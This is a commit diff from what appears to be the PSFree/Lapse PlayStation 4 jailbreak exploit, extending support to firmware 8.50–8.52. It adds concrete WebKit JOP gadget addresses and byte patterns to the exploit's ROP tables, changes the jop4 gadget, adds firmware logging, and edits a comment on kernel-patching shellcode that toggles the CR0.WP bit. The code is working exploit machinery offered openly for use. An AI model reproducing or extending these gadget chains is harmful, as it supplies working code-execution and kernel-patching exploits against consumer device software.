8.00-8.52 are now supported

CHANGELOG.md

@@ -15,6 +15,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
   @janisslsm
 - Added loading payload from file
 - Added read8/read16/write8/write16 functions
+- Added 8.50 and 8.52 support
 
 ### Fixed
 

README.md

@@ -22,7 +22,7 @@ This table indicates firmware versions for which the *current version* of this r
 
 |               | PSFree    | Lapse      |
 |:--------------|:----------|:-----------|
-| PlayStation 4 | 8.00-8.03 | 8.00-8.03  |
+| PlayStation 4 | 8.00-8.52 | 8.00-8.52  |
 | PlayStation 5 | N/A       | N/A        |
 
 *Note: Support for other firmwares listed in the "Vulnerability Scope" table may, or may not, be actively being worked on or may have been supported in previous versions of this repository. Please check `CHANGELOG.md` for historical support.*

src/lapse.mjs

@@ -64,6 +64,8 @@ const [is_ps4, version] = (() => {
     throw RangeError(`invalid config.target: ${hex(value)}`);
   }
 
+  log(`Console: PS${is_ps4 ? "4" : "5"} | Firmware: ${hex(version)}`);
+
   return [is_ps4, version];
 })();
 
@@ -1491,8 +1493,8 @@ async function get_binary(url) {
 }
 
 // Using JIT to load our own shellcode code here avoids the need to preform
-// some trick toggle the CR0 Protection Mode bit. We can just toggle it easily
+// some trick toggle the CR0.WP bit. We can just toggle it easily within our
-// within our shellcode.
+// shellcode.
 async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
   if (!is_ps4) {
     throw RangeError("ps5 kernel patching unsupported");

src/psfree.mjs

@@ -60,6 +60,8 @@ const [is_ps4, version] = (() => {
     throw RangeError(`invalid config.target: ${hex(value)}`);
   }
 
+  log(`Console: PS${is_ps4 ? "4" : "5"} | Firmware: ${hex(version)}`);
+
   return [is_ps4, version];
 })();
 

src/rop/ps4/800.mjs

@@ -61,7 +61,6 @@ call qword ptr [rax + 0x40]
 `;
 const jop4 = `
 push rdx
-mov edi, 0xac9784fe
 jmp qword ptr [rax]
 `;
 const jop5 = "pop rsp; ret";
@@ -112,7 +111,7 @@ const webkit_gadget_offsets = new Map(
     [jop1]: 0x0000000001988320, // `48 8b 7e 08 48 8b 07 ff 60 70`
     [jop2]: 0x000000000076b970, // `55 48 89 e5 48 8b 07 ff 50 30`
     [jop3]: 0x0000000000f62f95, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40`
-    [jop4]: 0x00000000021af6ad, // `52 bf fe 84 97 ac ff 20`
+    [jop4]: 0x0000000001ef0d16, // `52 ff 20`
     [jop5]: 0x00000000000bf669, // `5c c3`
   }),
 );

src/rop/ps4/850.mjs

@@ -37,7 +37,7 @@ export let libkernel_base = null;
 // libSceLibcInternal.sprx
 export let libc_base = null;
 
-// TODO: gadgets for the JOP chain
+// gadgets for the JOP chain
 //
 // we'll use JSC::CustomGetterSetter.m_setter to redirect execution. its
 // type is PutPropertySlot::PutValueFunc
@@ -61,7 +61,6 @@ call qword ptr [rax + 0x40]
 `;
 const jop4 = `
 push rdx
-mov edi, 0xac9784fe
 jmp qword ptr [rax]
 `;
 const jop5 = "pop rsp; ret";
@@ -109,11 +108,11 @@ const webkit_gadget_offsets = new Map(
     "mov dword ptr [rdi], eax; ret": 0x0000000000008e7f, // `89 07 c3`
     "mov dword ptr [rax], esi; ret": 0x0000000000cf6c22, // `89 30 c3`
 
-    [jop1]: 0x0000000000000000, // ``
+    [jop1]: 0x00000000019881d0, // `48 8b 7e 08 48 8b 07 ff 60 70`
-    [jop2]: 0x0000000000000000, // ``
+    [jop2]: 0x00000000011c9df0, // `55 48 89 e5 48 8b 07 ff 50 30`
-    [jop3]: 0x0000000000000000, // ``
+    [jop3]: 0x000000000126c9c5, // `48 8b 52 50 b9 0a 00 00 00 ff 50 40`
-    [jop4]: 0x0000000000000000, // ``
+    [jop4]: 0x00000000021f3a2e, // `52 ff 20`
-    [jop5]: 0x0000000000000000, // ``
+    [jop5]: 0x0000000000073c2b, // `5c c3`
   }),
 );